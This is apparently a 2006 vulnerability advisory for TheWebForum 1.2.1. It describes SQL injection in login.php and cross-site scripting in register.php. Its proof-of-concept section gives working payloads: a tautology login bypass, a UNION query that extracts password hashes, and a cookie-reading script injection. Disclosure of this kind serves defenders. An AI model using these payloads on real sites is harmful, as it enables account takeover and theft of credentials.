Script Insertion and Auth Bypass in TheWebForum

Summary

Vulnerability: Script Insertion and Auth Bypass in TheWebForum
Discovered: 2006.01.06
Last Update: 0 n/a
ID: EV0017
CVE: CVE-2006-0134 CVE-2006-0135
Risk Level: medium
Type: Multiple Vulnerabilities
Status: Unpatched
Vendor: TheWebForum Group
Vulnerable Software: TheWebForum (http://sourceforge.net/projects/twf/)
Version: 1.2.1
PoC/Exploit: Available
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)

Description

Multiple Vulnerabilities found in TheWebForum (http://sourceforge.net/projects/twf/) script.

TheWebForum has multiple vulnerabilities.

1. SQL injection and authentication bypass.

Vulnerable script: login.php

Variables $_POST['username'] or $u isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code and log in without password.

SQL Injection Condition: magic_quotes_gpc=off

2. Cross-Site Scripting

Vulnerable script: register.php

Variable $www isn't properly sanitized and may contain arbitrary html or script code.

PoC/Exploit

Authentication bypass example (SQL Injection):

http://host/twf/login.php

User Name: a' or 'a'='a'/*

Password: anypassword

Get user's password hash example (SQL Injection):

http://host/twf/login.php

User Name: a' union select N,password,3 from users/*

User name will contain password's hash of user with ID=N

JavaScript insertion (XSS):

http://host/twf/register.php

Website value: <script>alert(document.cookie)</script>

Solution.

Solution for "Script Insertion and Auth Bypass in TheWebForum" is not available. Check TheWebForum Group website for updates.

Script Insertion and Auth Bypass in TheWebForum

Summary

Description

1. SQL injection and authentication bypass.

2. Cross-Site Scripting

PoC/Exploit

Solution.

Company

Services

eVuln Labs

eVuln Tools